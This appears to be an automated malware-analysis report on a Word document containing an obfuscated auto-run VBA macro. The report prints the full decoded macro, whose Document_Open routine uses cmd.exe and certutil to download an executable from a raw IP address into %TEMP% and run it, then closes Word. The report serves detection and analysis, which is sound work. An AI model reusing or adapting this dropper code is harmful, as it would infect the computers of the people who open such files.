MALICIOUS
Risk Score: 290
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample is an OOXML document containing a VBA macro that automatically executes upon opening. This macro utilizes the Shell() function and references cmd.exe, indicating an intent to download and execute a secondary payload. The presence of a Document_Open macro and the use of Shell() are strong indicators of a dropper or downloader malware.
Heuristics 9
- ClamAV: Doc.Dropper.Agent-7083808-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7083808-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:
    k = "W"
    k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
    End Sub
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script:
    On Error Resume Next
    Set cpJwuFpoD = GetObject(, "Word.Application")
    If Not cpJwuFpoD Is Nothing Then
- cmd.exe reference in VBA (high, OLE_VBA_CMD). Matched line in script:
    vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _
    "ce" & _
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script:
    Private Sub Document_Open()
    Call ewqgqybweryqghd
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://13.75.76.78/andd/Host_outputF07F1DF.exe, found in document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13299 bytes |

SHA-256: 77d7c12aa4e52a5363c9821fd6e27335366dcb6061e5059e81af3ac9c8972a14

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 140 of 200 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call ewqgqybweryqghd
End Sub
Private Sub ewqgqybweryqghd()
Dim s34 As Object
If 88.2 = 22.2 Then
Else
End If
If 9 = 8 Then
Else
Dim mndmqdvqgfnbc As String
mndmqdvqgfnbc = "erYbnlZE.UOfImlcj"
Dim bbppgbniuxjjys
Application.Run bucvxatybaxwuvrp & mndmqdvqgfnbc & rxzp & trnfcjzm
End If
End Sub
Attribute VB_Name = "erYbnlZE"
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const hvdlurxavndib = 82204
#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const byony = 370
Private Declare PtrSafe Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const ctwbbbzcand = 5
#Else
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const rnlyxbgvoofcwhr = 86
Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type kvdcjmiicvywuywp
qggt As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const zgzy = 4047923
#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const qhy = 96
Private Declare PtrSafe Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const hbltuxsemxvfve = 1
#Else
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const sihp = 10
Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type kuyvlkniu
ibwqueakxygbv As Long
End Type
#If VBA7 Then
#Else
#End If
Public Sub UOfImlcj()
On Error Resume Next
'obgtjgowfezhueyr802ÙÇ©ÆÍ�¸®ã
'ÜÓ±½â�Ŧ֪?ÖÓ´Èݥéã?¤¦?
Dim fezhueyr As Integer
'jiukmfkdmmhlkocwxwbzurgq91
'9898
Dim obgtjgow(317) As String
obgtjgow(3) = "ÜÓ±½â�Ŧ֪?"
obgtjgow(5) = "ÖÓ´Èݥéã?¤¦?"
obgtjgow(1) = "ÙÇ©ÆÍ�¸®ã"
obgtjgow(6) = CStr(98)
'mcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'huzwubclbnpzztuebbhyidmkjftpndwymiwqsprwyikxbsygnn
'xcatpqhkedjirjfthquancmxav
Dim vzcrnewdjr As Variant
'kocwxwbzurgqfezhueyr91
'physuwblvg802
'ttrpbrqycdczlarphysuwblvg4232
Do Until 4503 = 4503
Dim huzwubclb As Object
Randomize
Loop
'802jiukmfkdmmhl
'898
'91fezhueyr
If toyvgyg = "ãÖÀÀÏ�¼»Þ??" Then
Dim tef
toyvgyg = 4071186761114#
End If
'brryaisesvmvlkhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'uczntaqbrrwyikxbsygnnpndwymiwqsprwyikxbsygnn
'wifzydvrbmcsiqnxhcwmogzlicmocnvcnhnpzztuebbhyidmk
'pndwymiwqsprwyikxbsygnnpndwymiwqsprwyikxbsygnn
'hquancmxavuczntaqbrrwyikxbsygnn
Select Case 37
Case Else
End Select
'jiukmfkdmmhl
'tefphysuwblvg#Q14
'toyvgyg
'4232physuwblvg
Dim akomhxtxmqvo, brwyikxbsygnn, czyhglqygod
For akomhxtxmqvo = 802 To 802 Step -1
czyhglqygod = 98
Next akomhxtxmqvo
Dim aryxmwwhhvnlwm As String
'komhxtxmqvojftjftrwyikxbsygnnhquancmxav
'rwyikxbsygnnhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'zyhglqygodrwyikxbsygnnrwyikxbsygnnhquancmxav
'npzztuebbhyidmkmcsiqnxhcwmogzlbrryaisesvmvlkhquancmxav
'jftmcsiqnxhcwmogzluczntaqbrrwyikxbsygnn
If IsDate(qdbkwpqnvxz) And ((8 + 802) / (4232 + 374369518)) <> 162384288395110# Then
wlb = "hjqag" & CStr("unuunwwbutw")
End If
'mywvdwycjftbrryaisesvmvlkhquancmxav
'icmocnvcnhnpzztuebbhyidmkbrryaisesvmvlkhquancmxav
'ÙÇ©ÆÍ�¸®ãQ14
'ÖÓ´Èݥéã?¤¦?Q11
'sdcypwcfnwzqpwlzioo73921134ëÕ¨ËѤƼé®
'ÚשÎß�¿ÞÖ¸Ê
Dim ioo As Integer
'ojlomawbtymo35165612
'2121
Dim sdcypwcfnwzqpwlz(444) As String
sdcypwcfnwzqpwlz(7) = "ÚשÎß�¿"
sdcypwcfnwzqpwlz(5) = "ÞÖ¸Ê"
sdcypwcfnwzqpwlz(4) = "ëÕ¨ËѤƼé®"
sdcypwcfnwzqpwlz(4) = CStr(21)
'lgcdppnjxvesnjmmcmpavbfsemx
'egyiswtzlehbvfxxqnsazndbclmppnjxvesnjmmcmpavbfsemx
'jgcmgtnlximaaysazndbclmixctlkegikai
Dim bxyapoajyjw As Variant
'omawbtymoioo35165612
'sfnxcptgvlezxmvg73921134
'nuxaexibgvxyldcsfnxcptgvlezxmvg65282
Do Until 1182 = 1182
Dim egyiswtzlehb As Object
Randomize
Loop
'73921134ojl
'136794321
'35165612ioo
If uuyouhtsoshdoxn = "âľÉÍ" Then
Dim gdg
uuyouhtsoshdoxn = 93499963983#
End If
'diqsixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'cwftpamgypavbfsemxppnjxvesnjmmcmpavbfsemx
'spdahaklclgcdcwlgnadzynenfvfxxqn
'ppnjxvesnjmmcmpavbfsemxppnjxvesnjmmcmpavbfsemx
'ixctlkegikaicwftpamgypavbfsemx
Select Case 40
Case Else
End Select
'ojl
'gdgsfnxcptgvlezxmvg#Q14
'uuyouhtsoshdoxn
'65282sfnxcptgvlezxmvg
Dim adiyh, bpavbfsemx, ckfs
For adiyh = 73921134 To 73921134 Step -1
ckfs = 21
Next adiyh
Dim drhdbarmcmqhnemh As String
'diyhsazndbclmsazndbclmpavbfsemxixctlkegikai
'pavbfsemxixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'kfspavbfsemxpavbfsemxixctlkegikai
'vfxxqnlgcddiqsixctlkegikai
'sazndbclmlgcdcwftpamgypavbfsemx
If IsDate(wpsavvjh) And ((1367943 + 73921134) / (65282 + 7321042)) <> 3937242557207# Then
nurmv = "zbudto" & CStr("lpriufnalxwfve")
End If
'cnnobwhnvvxsazndbclmdiqsixctlkegikai
'cwlgnadzynenfvfxxqndiqsixctlkegikai
'ëÕ¨ËѤƼé®Q14
'ÞÖ¸ÊQ11
If "DiUdvYYkaXFlJStAUnlrdpbLm" = "YBbYhDxeMgaOgBUysdJrVrLP" Then
gRiANHJrTzXJCpBn = "FNaFHkXewyBuGgqLHBmOeyZQXM"
wp = "oHDqlypMZgLWQIHwNThxuoOYAGnJhujaoGKu"
QurWucFDHiQJbzhPsvAsfpeKfeexkhKyNFxY = 6.22257731574995E+33
End If
Do Until "bZbbQeJFnxrREAVXsLyLtZJRbOh" <> "CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt"
sXhb = "lUTeGuMxcZbBKfZuMpKhLNVgbfNJgbFEQMg"
jlDFpAldxBUnTJfi = 373456919159794#
udYymCahDQAUXlxzHLbl = "sLbrj"
LZpXvWhVjHTxicYljkJZQW = 28934
MyEwRBSwHCdPINtFxqPOroNsIgGbriJJokd = "raPTQLMuFNQXqeMjAHxXkL"
lvrEYtUaXkUOWavygcTnvQikNVZIhmFpf = 3.23840053692693E+29
eYYGnAkmsnVQpJEJRvQXrVMGrDULtlefi = 6.81339610724978E+20
vXZZpTCJXuPwgPEXUKYIvJMSOjgZtG = 2.9383642571979E+42
qiGOhkrFx = "ixRrvWFHVQTGanmKHL"
mdPQlY = "aAXndEbnMLuaT"
bRXqpjIScWdg = 4.00053506930871E+25
bZbbQeJFnxrREAVXsLyLtZJRbOh = CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt
Loop
Do While 654 < 2
Select Case mrjbvyvrrtenqmi
Case "éзÀà�´¦í?¡??¦É¬", "ÓȾÆÞ?Ĺ֣??", "ßźÂà?®´á?"
zxcbnmmf1 = "àÄ®ÁÝ¥µ¦Ö£???¿"
Case "ÛÚ©", "àʨÎÔ¥ºµÙ?�?¥"
zxcbnmmf2 = "ØÓºÔ"
Case "ÛÖ¿¾Ð?»«ë®¡", "ÝϧÏÖ?³"
zxcbnmmf3 = "ìȵÐ"
Case Else
zxcbnmmf4 = "soaixylctbkejfr"
End Select
Exit Do
Randomize
Loop
Dim jepemzlaqkbwp As String
Dim xuhbj As Integer
xuhbj = 4364
jepemzlaqkbwp = "3RLivxKEmgZ2X1Fi"
Do While 847 < 7
Select Case oveebpdbvzlgoat
Case "à̬ÈÖ?Æ©ç¢", "ÛÖÀÇÍ?", "âöÁÒ£¹"
zxcbnmmf1 = "ë̽Ê?Ʀæ??"
Case "ÜÙ¹¿â¤¯¬", "éÖ«Èѣ¥è§?"
zxcbnmmf2 = "äÛ´Åß?º¥"
Case "ÞÒ»ÈÝ?°²", "ÕʸÂÒ?Á¹Ø©??"
zxcbnmmf3 = "ÓмÏÞ?"
Case Else
zxcbnmmf4 = "qfuifr"
End Select
Exit Do
Randomize
Loop
Dim nyzsktufmsu As String
Dim xghe As Integer
xghe = 4364
nyzsktufmsu = "3RLivxKEmgZ2X1Fi"
If 9324.234 + 2345.23 = 23566.2 Then
Else
lop = "tes098ll65435467889654356786543535353534534553453543535354ce1"
lop = Right(Left(lop, 8), 0.005 * 101)
lop1 = "tes098ce65435467889654356786543535353534534553453543535354ce1"
'lop = lop + Right(Left(lop1, 8), 0.005 * 200)
pol = Mid("sd98567879865432234567899765432gdc8e9895", 0.004 * 49911)
pol = lop
End If
a = Left("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1)
'Right function
b = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzH", 1)
f = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzT", 1)
'Mid function
c = Mid("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1, 11)
'Split function
d = Split("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next
vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _
"ce" & _
"rtuti" & pol & _
" " & _
"-urlcache" & _
" " & _
"-split" & _
" " & _
"-f" & _
" " & _
"http://13.75.76.78/andd/Host_outputF07F1DF.exe" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif" & _
"&" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif"
zmeqzvkwmnyx (vzurddc)
Do Until "ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp" <> "oEBBpgIqSBhjPsU"
eluQ = 1.08325364430548E+19
lgHA = "vAQOpjbygHNMdbTaTrsJy"
dRDOfZNCYtASkIZDLxHQLNpRHSwdRoP = "ZLWzKbECkeiULLqKAPguChZQclHMckkkeKtZ"
ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp = oEBBpgIqSBhjPsU
Loop
While "dMhLjRyFwxOVLroCTSXj" = "LmiMZQdgtCkwD"
kPEcABZdSrpIFCfdvvyIRZzyKBVYDveZIzEmO = "XinhTqXRLaAPGpxuZKQGRyfBZXNQzFytPFX"
VkFIbtquXooobOZ = "WIXZCmHwdGRFcHzBRgZpFHeYHkdliYolfEWGiy"
icIfUbkSPpnWu = "koPeyRRIWNESfaXlsSTTqMwbJxXSNwvBtwu"
GcjgvZGvbCvKuew = "DbyXrnUBuzuaRCYifH"
PinXQGBAHBMYjzaySyWYTIimwf = 6.7326294951552E+28
dYdMemzglPDiRqnMAhbLarDGkIiL = 4.23992557355971E+17
ABblZXb = 308547930842765#
Wend
EkeQQxZa
End Sub
Private Sub EkeQQxZa()
Dim cpJwuFpoD As Object
Do
On Error Resume Next
Set cpJwuFpoD = GetObject(, "Word.Application")
If Not cpJwuFpoD Is Nothing Then
cpJwuFpoD.Quit
Set cpJwuFpoD = Nothing
End If
Loop Until cpJwuFpoD Is Nothing
End Sub
Sub zmeqzvkwmnyx(StFmCsaKO As String)
While "wMdIKSkVAhsxAH" = "obHtnbgiOMbDU"
bZdwYIHwoqxFGVEEHBhihQVQjoPePwiPQbZHOA = 8.88143014062935E+30
yGrmQvhULeJFZVlMKENNksdh = "HipewwqGZicpeEUBTEzFrItePOCBnrGcKuJNr"
OhTyAmJXgAtMQodbByoLPiuoShczekvGJdqR = "sIHVrhCHbbRyjtKZgagnefTKJswFmCnx"
pIqhqXArgrG = 6.11922130360933E+20
Wend
k = "W"
k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 37888 bytes |

SHA-256: 0e289b33430de45c0cef680ce4b213b40b29ee1bb03be350aecdcacdb414c9dc

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 322 of 489 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).